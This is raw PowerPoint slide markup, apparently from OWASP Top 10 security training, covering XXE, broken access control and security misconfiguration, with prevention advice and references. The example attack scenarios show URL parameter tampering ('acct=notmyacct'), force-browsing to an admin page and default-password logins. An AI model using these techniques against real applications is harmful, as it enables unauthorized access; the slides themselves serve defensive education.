            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SAST tools can help detect XXE in source code, although manual code review is the best alternative in large, complex applications with many integrations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Being vulnerable to XXE attacks likely means that you are vulnerable to other billion laughs denial-of-service attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide - Testing for XML Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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9"/>
              </a:rPr>
              <a:t>OWASP XXE Vulnerability</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5"/>
              </a:rPr>
              <a:t>OWASP XXE Prevention Cheat Sheet</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0"/>
              </a:rPr>
              <a:t>OWASP XML Security Cheat Sheet</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900" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>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2"/>
              </a:rPr>
              <a:t>CWE-611 Improper Restriction of XXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Billion Laughs Attack</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latin typeface="Calibri"/>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Developer training is essential to identify and mitigate XXE completely. Besides that, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reventing XXE requires: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FontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Patch or upgrade all the latest XML processors and libraries in use by the application or on the underlying operating system. The use of dependency checkers is critical in managing the risk from necessary libraries and components in not only your application, but any downstream integrations.</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Disable XML external entity and DTD processing in all XML parsers in your application, as per the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP XXE Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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Implement positive ("whitelisting") input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Upgrade SOAP to the latest version.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If these controls are not possible, consider using virtual patching, API security gateways, or WAFs to detect, monitor, and block XXE attacks. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Arial"/>
              <a:cs typeface="Arial"/>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a:xfrm>
            <a:off x="1371600" y="76199"/>
            <a:ext cx="5486400" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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83177728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buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>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Arial"/>
                        </a:rPr>
                        <a:t>. Penetration testers can exploit XXE. DAST tools require additional manual steps to exploit this issue. </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>By default, many older XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>SAST tools can discover this issue by inspecting dependencies and configuration.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>These flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, and other attacks. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>The business impact depends on the protection needs of all affected applications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pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1,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("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>notmyacct</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http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin_getappInfo</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If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>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rPr>
              <a:t>page, this is a flaw.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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Broken Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Metadata manipulation, such as replaying or tampering with a JWT access control token or a cookie or hidden field manipulated to elevate privileges.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Force browsing to authenticated pages as an unauthenticated user, or to privileged pages as a standard user or API not enforcing access controls for POST, PUT and DELETE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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lvl="0">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</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Access Controls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V4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 Access Control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Cheat Sheet - Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">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1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</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CWE-284 Improper Access Control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CWE-285 Improper Authorization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CWE-639 Authorization Bypass Through User-Controlled Key</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3"/>
              </a:rPr>
              <a:t>Portswigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t> – Exploiting CORS Misconfiguration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Implement access control mechanisms once and re-use them throughout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Domain access controls are unique to each application, but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Disable web server directory listing, and ensure file metadata such (e.g. .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) is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Rate limiting API and controller access to minimize the harm from automated attack tooling</a:t>
            </a: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Developers and QA staff should include functional access control unit and integration tests.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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a:t>Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40088297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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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Exploitation of access control is a core skill of penetration testers. SAST and DAST tools can detect the absence of access control, but not verify if it is functional. Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain frameworks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="100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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The technical impact is anonymous attackers acting as users or administrators, users using privileged functions, or creating, accessing, updating or deleting every record.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Example Attack Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The app server admin console is automatically installed and not removed. Default accounts aren't changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Directory listing is not disabled on your server. An attacker discovers they can simply list directories. The attacker finds and downloads your compiled Java classes, which they decompile and reverse engineer to get your code. Attacker then finds a serious access control flaw in your application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: App server comes with sample apps that are not removed from your production server. These sample apps have known security flaws attackers use to compromise your server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Am I Vulnerable to Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Misconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"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171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="90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Are any unnecessary features enabled or installed (e.g. ports, services, pages, accounts, privileges)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="90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Are default accounts and their passwords still enabled and unchanged?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="90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Will error handling reveal stack traces or other overly informative error messages to users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="90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On upgraded systems, are the latest security features disabled or not configured securely?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="90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Are the security settings in your application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="90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For web applications, does the server not send security directives to client agents (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
